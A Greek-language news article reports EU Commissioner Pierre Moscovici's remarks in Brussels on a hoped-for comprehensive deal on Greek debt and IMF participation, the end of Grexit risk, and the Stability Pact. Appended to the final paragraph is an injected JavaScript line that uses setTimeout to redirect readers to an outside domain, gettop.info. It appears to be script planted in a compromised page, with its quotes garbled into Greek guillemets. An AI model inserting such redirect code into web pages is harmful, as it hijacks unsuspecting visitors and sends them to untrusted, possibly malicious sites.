Μοσκοβισί: Συνολική συμφωνία για χρέος και ΔΝΤ έως το τέλος του χρόνου

0
13

 

Σε εκδήλωση του Politico στις Βρυξέλλες βρέθηκε ο Επίτροπος Οικονομικών Υποθέσεων Πιερ Μοσκοβισί ο οποίος εξέφρασε την ελπίδα πως έως το τέλος του χρόνου θα υπάρχει μια συνολική συμφωνία για την Ελλάδα που θα περιλαμβάνει το χρέος και τη συμμετοχή του ΔΝΤ.

Όπως είπε χαρακτηριστικά ο Ευρωπαίος Επιτροπος: «Ελπίζω ότι θα έχουμε μια συνολική συμφωνία για την Ελλάδα μέχρι το τέλος του έτους, που θα περιλαμβάνει το χρέος και τη συμμετοχή του ΔΝΤ στο πρόγραμμα». Επίσης αναφέρθηκε στην «πρόοδο» που έχει σημειωθεί στην εφαρμογή των προαπαιτούμενων.

Ο κ. Μοσκοβισί υπογράμμισε πως έπειτα από χρόνια εργασίας για την αποφυγή του Grexit, πλέον δεν υπάρχει κανένα τέτοιο ενδεχόμενο και πως στόχος τώρα είναι να χτιστεί μια ιστορία επιτυχίας (success story), λέγοντας: «Το Grexit θα μετάλλασσε την ευρωζώνη σε ένα καθεστώς σταθερής συναλλαγματικής, και η ιστορία δείχνει ότι αυτά δεν επιβιώνουν».

Σε ό,τι αφορά την ευελιξία στην εφαρμογή του Πακέτου Σταθερότητας, ο Επίτροπος υπογράμμισε πως πρέπει να «δείξουμε προσήλωση στη συνοχή του Πακέτου». «Να το απλοποιήσουμε; Ναι. Να το καταστρέψουμε; Σίγουρα όχι» επεσήμανε συμπληρώνοντας πως οι κυρώσεις υπάρχουν, αλλά η Επιτροπή προτίμησε να μην τις χρησιμοποιήσει αλλά να επιλέξει τον διάλογο και τη στήριξη των μεταρρυθμίσεων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here